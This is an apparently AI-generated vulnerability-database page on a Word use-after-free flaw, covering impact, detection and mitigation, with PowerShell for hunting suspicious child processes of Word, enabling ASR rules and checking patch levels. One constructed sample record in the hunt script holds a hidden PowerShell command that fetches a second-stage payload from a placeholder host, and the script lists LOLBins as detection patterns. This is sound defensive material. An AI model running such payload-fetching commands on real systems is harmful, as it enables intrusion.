CVE Vulnerability Database

CVE-2025-62559: Microsoft 365 Apps Use-After-Free Flaw

CVE-2025-62559 is a use-after-free vulnerability in Microsoft Office Word that enables attackers to execute arbitrary code locally. This article covers the technical details, affected versions, security impact, and mitigation.


CVE-2025-62559 Overview

CVE-2025-62559 is a use-after-free vulnerability [CWE-416] in Microsoft Office Word that allows an unauthorized attacker to execute arbitrary code locally. The flaw affects multiple Microsoft Office product lines, including Microsoft 365 Apps, Office 2019, Office Long Term Servicing Channel (LTSC) 2021 and 2024, SharePoint Server 2016 and 2019, and Word 2016. Exploitation requires the victim to open a crafted document, after which the attacker gains code execution in the security context of the current user.

Critical Impact

Successful exploitation yields code execution in the security context of the user who opened the document, with full impact on the confidentiality, integrity, and availability of everything that account can reach. If that user is a local administrator, the attacker inherits those rights; least-privilege desktop accounts directly limit the blast radius.

Affected Products

  • Microsoft 365 Apps (Enterprise, x64 and x86)
  • Microsoft Office 2019, Office LTSC 2021 and 2024 (Windows and macOS)
  • Microsoft SharePoint Server 2016 and 2019; Microsoft Word 2016

Discovery Timeline

  • 2025-12-09 - CVE-2025-62559 published to NVD
  • 2026-06-17 - Last updated in NVD database

Technical Details for CVE-2025-62559

Vulnerability Analysis

The vulnerability is a use-after-free condition within Microsoft Word's document parsing logic. When Word processes a malformed object inside a Word document, the application releases a memory allocation but retains a dangling pointer to the freed region. Subsequent operations dereference that stale pointer, allowing an attacker who controls the freed memory layout to redirect execution flow.

The attack vector is local and user interaction is required: the victim must open a weaponized document, typically a .docx, .doc, or .rtf file, on the vulnerable host. Because SharePoint Server is also listed as affected, documents rendered or processed server-side through SharePoint may be an additional delivery surface. Code executes with the privileges of the user running Word, which makes the bug a strong candidate for initial access in phishing campaigns.

Root Cause

The root cause is improper object lifetime management within Word's parsing routines. An object is freed while a reference to it remains valid in another code path. When the freed slot is reallocated with attacker-controlled data, the dangling pointer enables hijacking of virtual function dispatch or other indirect calls.

Attack Vector

An attacker crafts a malicious Office document and delivers it through email, web download, or a SharePoint repository. When the target opens the document in a vulnerable version of Word, the parser triggers the use-after-free, yielding arbitrary code execution. No authentication is required, but user interaction is necessary. See the Microsoft CVE-2025-62559 Advisory for vendor details.

No verified proof-of-concept code is publicly available for CVE-2025-62559.
Refer to the Microsoft Security Response Center advisory for technical details.

Detection Methods for CVE-2025-62559

Indicators of Compromise

  • Unexpected child processes spawned by winword.exe, such as cmd.exe, powershell.exe, mshta.exe, rundll32.exe, or wscript.exe.
  • Office documents arriving from external senders that contain embedded OLE objects, malformed structures, or unusual ActiveX controls.
  • Outbound network connections initiated by Word shortly after opening a document, particularly to newly registered or low-reputation domains.

Detection Strategies

  • Hunt for process lineage anomalies where winword.exe is the parent of script interpreters or LOLBins commonly abused for second-stage payload delivery.
  • Monitor Windows Error Reporting events and Application log Event ID 1000 (Application Error) from winword.exe with exception code 0xc0000005 (access violation); a cluster of Word crashes shortly after a document is opened can indicate failed or unreliable exploitation attempts.
  • Inspect Office telemetry for documents opened with editing enabled despite an internet or e-mail origin, and for files that arrived by a path that strips Mark-of-the-Web, since both sidestep Protected View.

Monitoring Recommendations

  • Forward Sysmon process creation (Event ID 1) and image load (Event ID 7) events involving winword.exe to a centralized analytics platform.
  • Correlate email gateway attachment metadata with endpoint document-open events to identify weaponized files in transit.
  • Track SharePoint document library uploads and downloads of Office files originating from untrusted users or external sharing links.
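The lineage hunt described in the detection and monitoring lists above, as an added PowerShell example that is not part of the original page and is not Microsoft tooling. It assumes Sysmon process-creation logging (Event ID 1); the suspicious-child list is an assumption to tune locally, and the three sample records at the bottom are constructed, not real telemetry.

```powershell
# Added example, not code from the advisory or from Microsoft. Hunts Sysmon
# Event ID 1 (process creation) records for winword.exe spawning script
# interpreters or LOLBins. Sample records below are constructed.

# Children that Word has no legitimate reason to launch (assumed list; tune it).
$SuspiciousChildren = @(
    'cmd.exe', 'powershell.exe', 'pwsh.exe', 'mshta.exe', 'rundll32.exe',
    'wscript.exe', 'cscript.exe', 'regsvr32.exe', 'certutil.exe', 'bitsadmin.exe'
)

function ConvertFrom-SysmonEvent {
    # Flatten a live Sysmon record (from Get-WinEvent) into an object whose
    # properties are the EventData field names: Image, ParentImage, CommandLine, User, UtcTime.
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        $xml  = [xml]$Record.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]$data
    }
}

function Find-WordChildProcess {
    # Emit one finding per record where the parent is winword.exe and the child
    # is on the suspicious list. Accepts flattened live records or the samples below.
    param([Parameter(Mandatory, ValueFromPipeline)] [pscustomobject] $Event)
    process {
        $parent = [System.IO.Path]::GetFileName([string]$Event.ParentImage).ToLowerInvariant()
        $child  = [System.IO.Path]::GetFileName([string]$Event.Image).ToLowerInvariant()
        if ($parent -eq 'winword.exe' -and $SuspiciousChildren -contains $child) {
            [pscustomobject]@{
                UtcTime     = $Event.UtcTime
                User        = $Event.User
                Child       = $child
                CommandLine = $Event.CommandLine
            }
        }
    }
}

# Constructed sample records (hypothetical users, paths and URL).
$Samples = @(
    [pscustomobject]@{
        UtcTime     = '2025-12-10 09:14:03.120'
        User        = 'CORP\jdoe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe /c powershell.exe -w hidden -nop -c iwr http://example.invalid/stage2'
    },
    [pscustomobject]@{
        UtcTime     = '2025-12-10 09:14:05.004'
        User        = 'CORP\jdoe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'WINWORD.EXE /n'
    },
    [pscustomobject]@{
        UtcTime     = '2025-12-10 09:20:44.911'
        User        = 'CORP\asmith'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe'
    }
)

# Only the first sample is reported: Word spawning Word, and explorer spawning cmd, are benign here.
$Samples | Find-WordChildProcess | Format-Table -AutoSize

# Against live telemetry (Sysmon installed, run elevated):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ConvertFrom-SysmonEvent | Find-WordChildProcess
```

The same filter ports directly to a SIEM query (parent image ends with winword.exe, child image in the list); keep the child list narrow enough that legitimate Office add-ins and printer drivers do not page the on-call analyst.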

How to Mitigate CVE-2025-62559

Immediate Actions Required

  • Apply the security updates referenced in the Microsoft CVE-2025-62559 Advisory to all affected Office, Microsoft 365 Apps, Word, and SharePoint Server installations.
  • Enforce Protected View for files from the internet, e-mail attachments, and untrusted locations. Application Guard for Office has been deprecated by Microsoft and should not be relied on as a new control.
  • Use Office File Block policies to block, or force into Protected View, legacy binary formats (.doc, .dot, .rtf) where they are not needed. Macro restrictions do not affect this bug, which is triggered by the document parser rather than by VBA, but they remain sensible defense in depth.

Patch Information

Microsoft has published patches for all affected SKUs in its update guide. Administrators should deploy the corresponding monthly security updates for Microsoft 365 Apps, Office 2019, Office LTSC 2021 and 2024, Word 2016, and SharePoint Server 2016 and 2019. For Microsoft 365 Apps the fixed build differs by update channel (Current, Monthly Enterprise, Semi-Annual Enterprise), so verify patch application against the build number the vendor advisory lists for the channel each device is on, not against a single number.

Workarounds

  • Block inbound .doc, .rtf, and other legacy Word formats from untrusted senders at the email gateway until patches are deployed; outright blocking of .docx is rarely acceptable, so route those attachments to sandbox detonation or enforce Protected View on the endpoint instead.
  • Configure Group Policy to open Office documents from the internet zone in Protected View and disable editing by default.
  • Use Attack Surface Reduction (ASR) rules in Microsoft Defender to block Office applications from creating child processes and injecting code into other processes.
```powershell
# Enable the two ASR rules the workaround refers to (Office child processes and
# Office code injection). Add-MpPreference appends to the configured rule list;
# Set-MpPreference would replace every ASR rule already configured on the host.
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A, 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 `
                 -AttackSurfaceReductionRules_Actions Enabled, Enabled
```
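An added example, not Microsoft's code and not from the advisory, that checks the two things the mitigation steps ask an administrator to verify: that the installed Word build meets the fixed build taken from the MSRC update guide, and that the Office ASR rules are enforced in Block mode rather than Audit or not configured at all. The rule GUIDs are Microsoft's published ASR rule identifiers; the minimum build is a placeholder that must be replaced with the advisory's value for your channel.

```powershell
# Added example, not Microsoft code. Verifies Word build and ASR rule state.

function Get-InstalledWordVersion {
    # Click-to-Run installs (Microsoft 365 Apps, Office 2019, LTSC 2021/2024)
    # publish the build in VersionToReport. MSI installs (Word 2016) do not,
    # so fall back to the file version of winword.exe.
    $c2r = 'HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration'
    $v = (Get-ItemProperty -Path $c2r -Name VersionToReport -ErrorAction SilentlyContinue).VersionToReport
    if ($v) { return [version]$v }
    $exe = Get-ChildItem -Path "$env:ProgramFiles\Microsoft Office", "${env:ProgramFiles(x86)}\Microsoft Office" `
               -Filter WINWORD.EXE -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1
    if ($exe) { return [version]$exe.VersionInfo.FileVersion }
    return $null
}

function Test-WordPatched {
    param(
        [Parameter(Mandatory)] [version] $Installed,
        [Parameter(Mandatory)] [version] $MinimumFixed  # from the MSRC advisory for your channel
    )
    return ($Installed -ge $MinimumFixed)
}

function Get-OfficeAsrRuleState {
    # Three rules that limit what a compromised Word process can do next.
    $rules = [ordered]@{
        'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
        '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
        '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    }
    # Action codes as reported by Get-MpPreference.
    $actionName = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ } | ForEach-Object { $_.ToUpperInvariant() })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    foreach ($id in $rules.Keys) {
        $i = [array]::IndexOf($ids, $id)
        $state = if ($i -ge 0) { $actionName[[int]$actions[$i]] } else { 'NotConfigured' }
        [pscustomobject]@{ Rule = $rules[$id]; State = $state }
    }
}

# Usage. The minimum build below is a placeholder, not the real fixed build:
# replace it with the value from the MSRC update guide for this device's channel.
$installed = Get-InstalledWordVersion
if ($installed) {
    $fixed = [version]'16.0.0.0'   # placeholder
    "Word build $installed, at or above minimum: $(Test-WordPatched -Installed $installed -MinimumFixed $fixed)"
} else {
    'Word not found on this host.'
}
Get-OfficeAsrRuleState | Format-Table -AutoSize
```

Anything other than Block for the three rules means the child-process and injection workarounds are not actually in force; Audit mode only logs. Run the script under an elevated session, since Get-MpPreference and the HKLM read need it.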

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
